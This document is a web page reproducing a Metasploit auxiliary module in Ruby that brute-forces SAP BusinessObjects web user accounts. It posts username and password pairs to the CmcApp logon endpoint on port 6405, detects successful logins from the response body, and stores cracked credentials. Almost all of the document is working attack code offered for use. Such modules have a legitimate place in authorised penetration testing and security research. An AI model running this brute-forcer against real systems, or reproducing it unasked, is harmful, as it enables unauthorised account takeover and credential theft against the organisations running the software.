Headline
SAP BusinessObjects Web User Bruteforcer
This Metasploit module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SAP BusinessObjects Web User Bruteforcer', 'Description' => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.', 'References' => [ # General [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ] ], 'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(6405), ]) register_autofilter_ports([ 6405 ]) end def run_host(ip) res = send_request_cgi({ 'uri' => "/PlatformServices/service/app/logon.object", 'method' => 'GET' }, 25) return if not res each_user_pass { |user, pass| enum_user(user,pass) } end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: Time.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def enum_user(user, pass) vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'") success = false data = 'isFromLogonPage=true&cms=127.0.1%3A6400' data << "&username=#{Rex::Text.uri_encode(user.to_s)}" data << "&password=#{Rex::Text.uri_encode(pass.to_s)}" data << '&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces' begin res = send_request_cgi({ 'uri' => '/PlatformServices/service/app/logon.object', 'data' => data, 'method' => 'POST', 'headers' => { 'Connection' => "keep-alive", 'Accept-Encoding' => "gzip,deflate", }, }, 45) return :abort if (!res or (res and res.code != 200)) if(res.body.match(/Account Information/i)) success = false else success = true success end rescue ::Rex::ConnectionError vprint_error("[SAP BusinessObjects] Unable to attempt authentication") return :abort end if success print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, service_name: 'sap-businessobjects', user: user, password: pass, proof: res.body ) return :next_user else vprint_error("[SAP BusinessObjects] failed to login as '#{user}' password: '#{pass}'") return end endend